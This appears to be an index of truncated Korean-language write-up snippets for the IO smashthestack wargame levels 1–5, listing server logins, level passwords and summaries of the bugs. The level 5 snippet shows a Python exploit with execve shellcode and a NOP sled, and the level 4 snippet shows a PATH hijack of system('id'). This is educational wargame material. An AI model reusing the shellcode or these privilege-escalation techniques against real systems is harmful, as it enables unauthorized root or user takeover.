level5@io:/tmp/pwn3r$ cat exploit.py #!/usr/bin/python import os TARGET = "/levels/level05" SHELLCODE = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" print "[!] Exploit started!" for i in range(0xff , 0x00 , -1): for j in range(0x01 , 0x100 , 100): payload = "" payload += "\x90" * 100 payload += SHELLCODE payload += "\x90" * (40 - len(SHEL..
Wargame/IO.smashthestack.org
level4@io:/tmp/.pwn3r$ ls -l /levels/level04* -r-sr-x--- 1 level5 level4 7016 Nov 16 2007 /levels/level04 -r-------- 1 level4 level4 65 Nov 16 2007 /levels/level04.c level4@io:/tmp/.pwn3r$ cat /levels/level04.c #include int main() { system("id"); return 0; } level4@io:/tmp/.pwn3r$ ls -l total 12 -rwxr-xr-x 1 level4 level4 6639 Apr 8 15:09 id -rw-r--r-- 1 level4 level4 89 Apr 8 15:09 id.c level4@..
Category : System hacking ssh://io.smashthestack.org:2224 id : level3 pw : f9esfdy8T6Hd Summary : overflow , overwrite function pointer 서버에 접속하여 문제 파일을 확인한다. level3@io:/levels$ ls -l | grep level03 -r-sr-x--- 1 level4 level3 7768 Nov 18 2007 level03 -r-------- 1 level3 level3 603 Nov 18 2007 level03.c setuid가 걸린 level4 user의 실행파일을 볼 수 있으며 , source 파일도 제공되어있다. source 파일을 확인한다. level3@io:/levels$..
Category : System hacking ssh://io.smashthestack.org:2224 id : level2 pw : WE5aVWRwYPhX Summary : integer range , SIGFPE signal 서버에 접속하여 문제 파일을 확인한다. level2@io:/levels$ ls -l | grep level02 -r-sr-x--- 1 level3 level2 7247 May 26 12:00 level02 -r-------- 1 level2 level2 490 May 26 11:59 level02.c -r-sr-x--- 1 level3 level2 6940 May 26 11:57 level02_alt -r-------- 1 level2 level2 437 May 26 11:5..
Category : System hacking ssh://io.smashthestack.org:2224 id : level1 pw : level1 Summary : strings , ltrace , basic debugging 서버에 접속하여 /levels에 있는 문제 바이너리를 확인한다. level1@io:/levels$ ls -l level01 -r-sr-x--- 1 level2 level1 7500 Nov 16 2007 level01 level1@io:/levels$ file level01 level01: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for..
